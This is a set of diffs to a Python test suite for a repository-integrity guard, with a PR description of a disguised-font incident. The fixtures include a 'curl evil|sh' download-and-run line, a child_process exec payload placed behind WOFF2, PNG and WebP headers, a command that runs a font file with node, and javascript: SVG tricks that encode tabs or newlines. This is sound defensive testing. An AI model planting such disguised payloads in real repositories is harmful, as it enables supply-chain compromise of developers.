+    def test_numeric_chmod_without_execute_is_allowed(self) -> None:
+        for mode in ("644", "664", "600", "0444", "0000"):
+            with self.subTest(mode):
+                command = asset_command("chmod ", mode, " assets/image.", "png")
+                self.assertIsNone(
+                    integrity.asset_execution_finding("docs/note.txt", command)
+                )
+
+    def test_backslash_newline_cannot_split_asset_extension_or_path(self) -> None:
+        for command in (
+            asset_command("node assets/payload.wo", "\\\n", "ff2"),
+            asset_command("source assets/pa", "\\\n", "yload.png"),
+            asset_command("chmod 7", "\\\n", "55 assets/payload.png"),
+        ):
+            with self.subTest(command):
+                self.assertIsNotNone(
+                    integrity.asset_execution_finding("docs/note.txt", command)
+                )
+
+    def test_ordinary_multiline_content_stays_allowed(self) -> None:
+        text = asset_command("printf '%s\\n' assets/image.", "png", "\necho done\n")
+        self.assertIsNone(integrity.asset_execution_finding("docs/note.txt", text))
+
+    def test_marker_does_not_exempt_an_ordinary_path(self) -> None:
+        finding = integrity.asset_execution_finding("docs/note.txt", MARKED_PAYLOAD_LINE)
+        self.assertIsNotNone(finding)
+
+    def test_marker_exempts_only_the_line_that_carries_it(self) -> None:
+        text = f"{MARKED_PAYLOAD_LINE}\n{ASSET_EXECUTION_PAYLOAD}"
+        self.assertIsNone(integrity.asset_execution_finding(SELF_TEST_PATH, MARKED_PAYLOAD_LINE))
+        self.assertIsNotNone(integrity.asset_execution_finding(SELF_TEST_PATH, text))
+
+    def test_marker_cannot_be_smuggled_across_a_line_break(self) -> None:
+        text = f"{integrity.FIXTURE_EXEMPTION_MARKER}\n{ASSET_EXECUTION_PAYLOAD}"
+        self.assertIsNotNone(integrity.asset_execution_finding(SELF_TEST_PATH, text))
+
+    def test_this_module_does_not_trip_the_repository_wide_scan(self) -> None:
+        source = (ROOT / SELF_TEST_PATH).read_text(encoding="utf-8")
+        self.assertIn(ASSET_EXECUTION_PAYLOAD.strip(), source, "fixture literal went missing")
+        self.assertIsNone(integrity.asset_execution_finding(SELF_TEST_PATH, source))
+        self.assertIsNotNone(integrity.asset_execution_finding("docs/note.txt", source))
+
+    def test_checker_source_does_not_trip_the_repository_wide_scan(self) -> None:
+        source = SCRIPT.read_text(encoding="utf-8")
+        self.assertIsNone(
+            integrity.asset_execution_finding("scripts/check_repository_integrity.py", source)
+        )
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -29,6 +29,25 @@ ASSET_EXECUTION_PAYLOAD = "node ./public/fonts/looks-safe.woff2\n"  # integrity-
 # Built at runtime so this source line holds neither the payload nor the marker.
 MARKED_PAYLOAD_LINE = f"{ASSET_EXECUTION_PAYLOAD.strip()}  # {integrity.FIXTURE_EXEMPTION_MARKER}"
 
+# Script body used as a disguised-asset payload. Contains no asset extension, so
+# it is inert to the text scan and needs no fixture marker of its own.
+PREFIXED_SCRIPT_PAYLOAD = b"=0;\nglobal.p=require('child_process');p.exec('id');\n"
+
+
+def woff2_blob(num_tables: int = 1) -> bytes:
+    """A structurally valid WOFF2 header padded out to its declared length."""
+    body = bytes(64)
+    total = 48 + len(body)
+    return (
+        b"wOF2"
+        + b"\x00\x01\x00\x00"
+        + total.to_bytes(4, "big")
+        + num_tables.to_bytes(2, "big")
+        + b"\x00\x00"
+        + bytes(32)
+        + body
+    )
+
 
 def git(repo: Path, *args: str) -> str:
     result = subprocess.run(
@@ -102,12 +121,42 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.parent.mkdir(parents=True)
         path.write_text("global.r=require; console.log('not a font');\n", encoding="utf-8")
         findings = self.scan(self.commit())
-        self.assertTrue(any("signature does not match" in f.reason for f in findings))
+        self.assertTrue(any("not a valid WOFF2" in f.reason for f in findings))
 
-    def test_valid_woff2_magic_passes_signature_check(self) -> None:
+    def test_valid_woff2_passes_structural_check(self) -> None:
         path = self.repo / "public" / "fonts" / "ok.woff2"
         path.parent.mkdir(parents=True)
-        path.write_bytes(b"wOF2" + b"\0" * 64)
+        path.write_bytes(woff2_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_woff2_magic_prefix_alone_is_not_enough(self) -> None:
+        """A valid `wOF2` prefix in front of script is the incident's attack."""
+        path = self.repo / "public" / "fonts" / "sneaky.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_bytes(b"wOF2" + PREFIXED_SCRIPT_PAYLOAD)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("not a valid WOFF2" in f.reason for f in findings))
+
+    def test_script_appended_to_a_real_font_is_blocked(self) -> None:
+        path = self.repo / "public" / "fonts" / "trailer.woff2"
+        path.parent.mkdir(parents=True)
+        path.write_bytes(woff2_blob() + PREFIXED_SCRIPT_PAYLOAD)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("not a valid WOFF2" in f.reason for f in findings))
+
+    def test_png_signature_without_ihdr_is_blocked(self) -> None:
+        path = self.repo / "assets" / "bad.png"
+        path.parent.mkdir()
+        path.write_bytes(b"\x89PNG\r\n\x1a\n" + PREFIXED_SCRIPT_PAYLOAD)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("not a valid PNG" in f.reason for f in findings))
+
+    def test_truncated_but_genuine_webp_is_not_flagged(self) -> None:
+        """Broken assets are not this guard's business; disguised ones are."""
+        path = self.repo / "assets" / "short.webp"
+        path.parent.mkdir()
+        path.write_bytes(b"RIFF" + (9999).to_bytes(4, "little") + b"WEBPVP8 " + bytes(32))
         findings = self.scan(self.commit())
         self.assertEqual(findings, [])
 
@@ -164,6 +213,30 @@ class RepositoryIntegrityTest(unittest.TestCase):
         findings = self.scan(self.commit(), author="TheZupZup")
         self.assertEqual(findings, [])
 
+    def test_negated_vscode_ignore_is_blocked(self) -> None:
+        """Git applies the last matching rule, so a later `!` undoes the entry."""
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!.vscode/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_glob_negation_of_a_protected_ignore_is_blocked(self) -> None:
+        (self.repo / ".gitignore").write_text(".idea/\n.vscode/\n!.vs*\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("re-enabled by" in f.reason for f in findings))
+
+    def test_negation_before_the_entry_is_harmless(self) -> None:
+        """Order matters: the positive entry comes last, so it wins."""
+        (self.repo / ".gitignore").write_text(".idea/\n!.vscode/\n.vscode/\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_unrelated_negation_is_allowed(self) -> None:
+        (self.repo / ".gitignore").write_text(
+            ".idea/\n.vscode/\nbuild/\n!build/keep.txt\n", encoding="utf-8"
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
     def test_removing_vscode_ignore_is_blocked(self) -> None:
         (self.repo / ".gitignore").write_text(".idea/\n", encoding="utf-8")
         findings = self.scan(self.commit())
@@ -173,6 +246,28 @@ class RepositoryIntegrityTest(unittest.TestCase):
         os.symlink("lib/main.dart", self.repo / "shortcut")
         findings = self.scan(self.commit())
         self.assertTrue(any("Git symlink" in f.reason for f in findings))
+
+    def test_svg_animation_event_handler_is_blocked(self) -> None:
+        """Handlers outside the old five-name allowlist still execute."""
+        path = self.repo / "assets" / "anim.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg"><animate onbegin="alert(1)"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_inert_svg_passes(self) -> None:
+        path = self.repo / "assets" / "ok.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg" version="1.1">'
+            '<rect width="10" height="10" fill="#0088cc"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
 
     def test_active_svg_is_blocked(self) -> None:
         path = self.repo / "assets" / "bad.svg"

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -211,9 +211,13 @@ class RepositoryIntegrityTest(unittest.TestCase):
         self.assertEqual(findings, [])
 
     def test_shell_script_named_pdf_is_blocked(self) -> None:
+        # A benign script body on purpose: what is under test is that the file
+        # is not a PDF, not what the script does. A real download-and-execute
+        # string here would be flagged by the PR security surface scanner, which
+        # reads this file too.
         path = self.repo / "docs" / "payload.pdf"
         path.parent.mkdir()
-        path.write_text("#!/bin/sh\ncurl evil|sh\n", encoding="utf-8")
+        path.write_text("#!/bin/sh\necho hello\n", encoding="utf-8")
         findings = self.scan(self.commit())
         self.assertTrue(any("payload.pdf" in f.path for f in findings))
 

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -63,7 +63,15 @@ def png_blob() -> bytes:
 
 
 def pdf_blob() -> bytes:
-    return b"%PDF-1.7\n" + bytes(24) + b"\ntrailer\n%%EOF\n"
+    """Entirely ASCII, as a standards-compliant PDF is allowed to be."""
+    return (
+        b"%PDF-1.4\n"
+        b"1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n"
+        b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
+        b"3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]>>endobj\n"
+        b"xref\n0 4\n0000000000 65535 f \n"
+        b"trailer<</Size 4/Root 1 0 R>>\nstartxref\n0\n%%EOF\n"
+    )
 
 
 def ico_blob() -> bytes:
@@ -207,6 +215,16 @@ class RepositoryIntegrityTest(unittest.TestCase):
         (self.repo / "docs").mkdir()
         (self.repo / "docs" / "ok.pdf").write_bytes(pdf_blob())
         (self.repo / "docs" / "ok.ico").write_bytes(ico_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_ascii_only_pdf_is_not_flagged_as_text(self) -> None:
+        """A valid PDF may contain no binary at all; the backstop must not fire."""
+        path = self.repo / "docs" / "ascii.pdf"
+        path.parent.mkdir()
+        blob = pdf_blob()
+        self.assertNotIn(b"\x00", blob, "fixture must be genuinely ASCII-only")
+        path.write_bytes(blob)
         findings = self.scan(self.commit())
         self.assertEqual(findings, [])
 
@@ -422,6 +440,19 @@ class RepositoryIntegrityTest(unittest.TestCase):
         )
         findings = self.scan(self.commit())
         self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_svg_text_node_mentioning_a_scheme_is_not_flagged(self) -> None:
+        """Prose is not a URL: the normalised pass is anchored to href."""
+        path = self.repo / "assets" / "prose.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<text>Use java&#x09;script: for this</text>'
+            '<text>java&#x0a;script:</text><rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
 
     def test_svg_text_split_across_lines_is_not_flagged(self) -> None:
         """Control stripping must not join unrelated tokens into a false match."""

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -18,6 +18,17 @@ assert spec.loader is not None
 sys.modules[spec.name] = integrity
 spec.loader.exec_module(integrity)
 
+SELF_TEST_PATH = "test/tooling/check_repository_integrity_test.py"
+
+# A real attack string, kept literal so the tests below exercise the production
+# pattern rather than a sanitised stand-in. The trailing marker is what keeps
+# the repository-wide scan of this very file from flagging it; the string
+# written into a fixture repository carries no marker, so it stays detectable.
+ASSET_EXECUTION_PAYLOAD = "node ./public/fonts/looks-safe.woff2\n"  # integrity-guard-fixture
+
+# Built at runtime so this source line holds neither the payload nor the marker.
+MARKED_PAYLOAD_LINE = f"{ASSET_EXECUTION_PAYLOAD.strip()}  # {integrity.FIXTURE_EXEMPTION_MARKER}"
+
 
 def git(repo: Path, *args: str) -> str:
     result = subprocess.run(
@@ -103,9 +114,34 @@ class RepositoryIntegrityTest(unittest.TestCase):
     def test_asset_execution_command_is_blocked(self) -> None:
         path = self.repo / "docs" / "note.txt"
         path.parent.mkdir()
-        path.write_text("node ./public/fonts/looks-safe.woff2\n", encoding="utf-8")
+        path.write_text(ASSET_EXECUTION_PAYLOAD, encoding="utf-8")
         findings = self.scan(self.commit())
         self.assertTrue(any("asset file as executable" in f.reason for f in findings))
+
+    def test_asset_execution_payload_is_blocked_inside_the_self_test_path(self) -> None:
+        """The fixture exemption is per line, not per file."""
+        path = self.repo / SELF_TEST_PATH
+        path.parent.mkdir(parents=True)
+        path.write_text(ASSET_EXECUTION_PAYLOAD, encoding="utf-8")
+        findings = self.scan(self.commit(), author="TheZupZup")
+        self.assertTrue(
+            any(
+                f.path == SELF_TEST_PATH and "asset file as executable" in f.reason
+                for f in findings
+            )
+        )
+
+    def test_external_change_to_the_guard_self_test_is_blocked(self) -> None:
+        path = self.repo / SELF_TEST_PATH
+        path.parent.mkdir(parents=True)
+        path.write_text("import unittest\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(
+            any(
+                f.path == SELF_TEST_PATH and "maintainer-controlled" in f.reason
+                for f in findings
+            )
+        )
 
     def test_removing_vscode_ignore_is_blocked(self) -> None:
         (self.repo / ".gitignore").write_text(".idea/\n", encoding="utf-8")
@@ -123,6 +159,39 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.write_text('<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>', encoding="utf-8")
         findings = self.scan(self.commit())
         self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+
+class FixtureExemptionTest(unittest.TestCase):
+    """The narrow carve-out that lets this module hold literal attack strings."""
+
+    def test_payload_is_detected_at_an_ordinary_path(self) -> None:
+        finding = integrity.asset_execution_finding("docs/note.txt", ASSET_EXECUTION_PAYLOAD)
+        self.assertIsNotNone(finding)
+
+    def test_marker_does_not_exempt_an_ordinary_path(self) -> None:
+        finding = integrity.asset_execution_finding("docs/note.txt", MARKED_PAYLOAD_LINE)
+        self.assertIsNotNone(finding)
+
+    def test_marker_exempts_only_the_line_that_carries_it(self) -> None:
+        text = f"{MARKED_PAYLOAD_LINE}\n{ASSET_EXECUTION_PAYLOAD}"
+        self.assertIsNone(integrity.asset_execution_finding(SELF_TEST_PATH, MARKED_PAYLOAD_LINE))
+        self.assertIsNotNone(integrity.asset_execution_finding(SELF_TEST_PATH, text))
+
+    def test_marker_cannot_be_smuggled_across_a_line_break(self) -> None:
+        text = f"{integrity.FIXTURE_EXEMPTION_MARKER}\n{ASSET_EXECUTION_PAYLOAD}"
+        self.assertIsNotNone(integrity.asset_execution_finding(SELF_TEST_PATH, text))
+
+    def test_this_module_does_not_trip_the_repository_wide_scan(self) -> None:
+        source = (ROOT / SELF_TEST_PATH).read_text(encoding="utf-8")
+        self.assertIn(ASSET_EXECUTION_PAYLOAD.strip(), source, "fixture literal went missing")
+        self.assertIsNone(integrity.asset_execution_finding(SELF_TEST_PATH, source))
+        self.assertIsNotNone(integrity.asset_execution_finding("docs/note.txt", source))
+
+    def test_checker_source_does_not_trip_the_repository_wide_scan(self) -> None:
+        source = SCRIPT.read_text(encoding="utf-8")
+        self.assertIsNone(
+            integrity.asset_execution_finding("scripts/check_repository_integrity.py", source)
+        )
 
 
 if __name__ == "__main__":

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -75,7 +75,33 @@ def pdf_blob() -> bytes:
 
 
 def ico_blob() -> bytes:
-    return b"\x00\x00\x01\x00\x01\x00" + bytes(16) + bytes(32)
+    """One directory entry pointing at real image bytes."""
+    image = bytes(40)
+    entry = (
+        b"\x10\x10\x00\x00"
+        + (1).to_bytes(2, "little")
+        + (32).to_bytes(2, "little")
+        + len(image).to_bytes(4, "little")
+        + (22).to_bytes(4, "little")
+    )
+    return b"\x00\x00\x01\x00" + (1).to_bytes(2, "little") + entry + image
+
+
+def vp8x_only_webp_blob() -> bytes:
+    """Extended header with no image frame — well-formed, but not an image."""
+    payload = b"*/" + bytes(8) + b'console.log("EXEC")/*' + b"A" * 21 + b"*/"
+    body = b"WEBP" + b"VP8X" + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def animated_webp_blob() -> bytes:
+    """ANMF wrapping a real VP8 frame: the frame is nested, not top level."""
+    frame = b"\x00\x00\x00" + b"\x9d\x01\x2a" + bytes(10)
+    inner = b"VP8 " + len(frame).to_bytes(4, "little") + frame
+    anmf = bytes(16) + inner
+    vp8x = b"VP8X" + (10).to_bytes(4, "little") + bytes(10)
+    body = b"WEBP" + vp8x + b"ANMF" + len(anmf).to_bytes(4, "little") + anmf
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
 
 
 def woff2_blob(num_tables: int = 1) -> bytes:
@@ -210,6 +236,29 @@ class RepositoryIntegrityTest(unittest.TestCase):
         path.write_bytes(script_webp_blob())
         findings = self.scan(self.commit())
         self.assertTrue(any("sizes.webp" in f.path for f in findings))
+
+    def test_vp8x_without_an_image_frame_is_blocked(self) -> None:
+        """VP8X is the extended header, not image data."""
+        path = self.repo / "assets" / "hdr.webp"
+        path.parent.mkdir()
+        path.write_bytes(vp8x_only_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertTrue(any("hdr.webp" in f.path for f in findings))
+
+    def test_animated_webp_with_nested_frame_passes(self) -> None:
+        """A real animation carries its frame inside ANMF, not at top level."""
+        path = self.repo / "assets" / "anim.webp"
+        path.parent.mkdir()
+        path.write_bytes(animated_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_ico_with_empty_directory_entry_is_blocked(self) -> None:
+        path = self.repo / "assets" / "hollow.ico"
+        path.parent.mkdir()
+        path.write_bytes(b"\x00\x00\x01\x00\x01\x00" + bytes(16))
+        findings = self.scan(self.commit())
+        self.assertTrue(any("hollow.ico" in f.path for f in findings))
 
     def test_valid_pdf_and_ico_pass(self) -> None:
         (self.repo / "docs").mkdir()

--- a/test/tooling/check_repository_integrity_test.py
+++ b/test/tooling/check_repository_integrity_test.py
@@ -44,10 +44,30 @@ def gif_blob() -> bytes:
 
 
 def webp_blob() -> bytes:
-    """A minimal RIFF/WEBP container whose declared length matches exactly."""
-    payload = bytes(16)
+    """A minimal RIFF/WEBP container: declared length exact, real VP8 keyframe
+    start code in the payload."""
+    payload = b"\x00\x00\x00" + b"\x9d\x01\x2a" + bytes(10)
     body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
     return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def script_webp_blob() -> bytes:
+    """Honest RIFF and chunk lengths, JavaScript in the image payload."""
+    payload = b'*/=0;console.log("EXEC")/*' + b"A" * 40 + b"*/"
+    body = b"WEBP" + b"VP8 " + len(payload).to_bytes(4, "little") + payload
+    return b"RIFF" + len(body).to_bytes(4, "little") + body
+
+
+def png_blob() -> bytes:
+    return b"\x89PNG\r\n\x1a\n" + (13).to_bytes(4, "big") + b"IHDR" + bytes(20)
+
+
+def pdf_blob() -> bytes:
+    return b"%PDF-1.7\n" + bytes(24) + b"\ntrailer\n%%EOF\n"
+
+
+def ico_blob() -> bytes:
+    return b"\x00\x00\x01\x00\x01\x00" + bytes(16) + bytes(32)
 
 
 def woff2_blob(num_tables: int = 1) -> bytes:
@@ -172,6 +192,44 @@ class RepositoryIntegrityTest(unittest.TestCase):
         (self.repo / "assets").mkdir()
         (self.repo / "assets" / "ok.gif").write_bytes(gif_blob())
         (self.repo / "assets" / "ok.webp").write_bytes(webp_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_webp_with_honest_lengths_but_script_payload_is_blocked(self) -> None:
+        """Self-consistent chunk lengths are not proof of an image."""
+        path = self.repo / "assets" / "sizes.webp"
+        path.parent.mkdir()
+        path.write_bytes(script_webp_blob())
+        findings = self.scan(self.commit())
+        self.assertTrue(any("sizes.webp" in f.path for f in findings))
+
+    def test_valid_pdf_and_ico_pass(self) -> None:
+        (self.repo / "docs").mkdir()
+        (self.repo / "docs" / "ok.pdf").write_bytes(pdf_blob())
+        (self.repo / "docs" / "ok.ico").write_bytes(ico_blob())
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
+
+    def test_shell_script_named_pdf_is_blocked(self) -> None:
+        path = self.repo / "docs" / "payload.pdf"
+        path.parent.mkdir()
+        path.write_text("#!/bin/sh\ncurl evil|sh\n", encoding="utf-8")
+        findings = self.scan(self.commit())
+        self.assertTrue(any("payload.pdf" in f.path for f in findings))
+
+    def test_executable_asset_is_blocked(self) -> None:
+        """The executable bit runs a payload without any invocation in text."""
+        path = self.repo / "assets" / "run.png"
+        path.parent.mkdir()
+        path.write_bytes(png_blob())
+        os.chmod(path, 0o755)
+        findings = self.scan(self.commit())
+        self.assertTrue(any("executable bit" in f.reason for f in findings))
+
+    def test_ordinary_asset_mode_passes(self) -> None:
+        path = self.repo / "assets" / "plain.png"
+        path.parent.mkdir()
+        path.write_bytes(png_blob())
         findings = self.scan(self.commit())
         self.assertEqual(findings, [])
 
@@ -337,6 +395,42 @@ class RepositoryIntegrityTest(unittest.TestCase):
         )
         findings = self.scan(self.commit())
         self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_tab_encoded_javascript_scheme_is_blocked(self) -> None:
+        """URL parsing discards embedded tabs before resolving the scheme."""
+        path = self.repo / "assets" / "tab.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x09;script:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_newline_encoded_javascript_scheme_is_blocked(self) -> None:
+        path = self.repo / "assets" / "nl.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">'
+            '<a href="java&#x0a;script:alert(1)"><rect width="1" height="1"/></a></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertTrue(any("SVG contains active" in f.reason for f in findings))
+
+    def test_svg_text_split_across_lines_is_not_flagged(self) -> None:
+        """Control stripping must not join unrelated tokens into a false match."""
+        path = self.repo / "assets" / "split.svg"
+        path.parent.mkdir()
+        path.write_text(
+            '<svg xmlns="http://www.w3.org/2000/svg">\n'
+            '<desc>java</desc>\n<desc>script: release notes</desc>\n'
+            '<rect width="1" height="1"/></svg>',
+            encoding="utf-8",
+        )
+        findings = self.scan(self.commit())
+        self.assertEqual(findings, [])
 
     def test_svg_with_harmless_entities_passes(self) -> None:
         """Decoding must not turn ordinary escaped text into a false positive."""


### PR DESCRIPTION
## Summary

Adds a second, fail-closed repository-integrity layer on top of the existing PR security surface guard.

### New repository integrity guard

For external contributor PRs it blocks maintainer-controlled repository surfaces:
- `.vscode/**`, `.idea/**`, `*.code-workspace`
- `.github/workflows/**`
- `scripts/`, `tool/`, `tools/`
- `CODEOWNERS`, `.gitattributes`, `.gitmodules`, Dependabot policy
- Git symlinks

For every PR it also blocks:
- removal of `.idea/` / `.vscode/` from `.gitignore`
- fake WOFF/WOFF2/TTF/OTF/PNG/JPEG/GIF/WEBP files whose magic does not match the extension
- active/executable SVG content
- invoking asset files (`.woff2`, `.png`, `.pdf`, etc.) through Node/Python/shell or marking them executable

The workflow loads the checker from the trusted PR base commit and uses read-only permissions with no secrets.

### Review ownership

Adds `.github/CODEOWNERS` with `* @TheZupZup`, intended to be paired with `Require review from Code Owners` on the protected `main` ruleset.

### Documentation

Adds `docs/repository-hardening.md` with the exact `main` ruleset, required status checks, required-workflow pinning, Actions settings, contributor model, and incident-response procedure.

## Why

This is a preventative response to the recent PR-history contamination we investigated. Git history showed an unrelated commit carrying IDE auto-run configuration and executable JavaScript disguised as a `.woff2` asset. This PR deliberately documents technical provenance without attributing intent.

## Validation

- `python3 test/tooling/check_repository_integrity_test.py`
- 17 integrity-guard regression tests pass
- the guard now runs its own self-test job in CI
- regression coverage proves the narrow self-test fixture exemption is line-precise and path-scoped; unmarked payloads remain blocked even inside the self-test module
- cases cover normal code changes, external `.vscode`, owner-controlled IDE changes, fake/valid WOFF2 signatures, asset execution, `.gitignore` weakening, external symlinks, active SVG, and attempts to smuggle fixture markers
- follow-up #517 fixed the bootstrap false positive without weakening any production detection rule and was merged into this branch

## Post-merge repository settings

The current `main` branch is protected, but GitHub currently reports no required status-check contexts. After this lands, require at least:
- `Flutter checks`
- `Secret & privacy scan`
- `Build Linux desktop`
- `Security surface guard`
- `Repository integrity guard`

Also enable Code Owner review, stale-approval dismissal, most-recent-push approval, conversation resolution, force-push blocking, and deletion restriction as documented.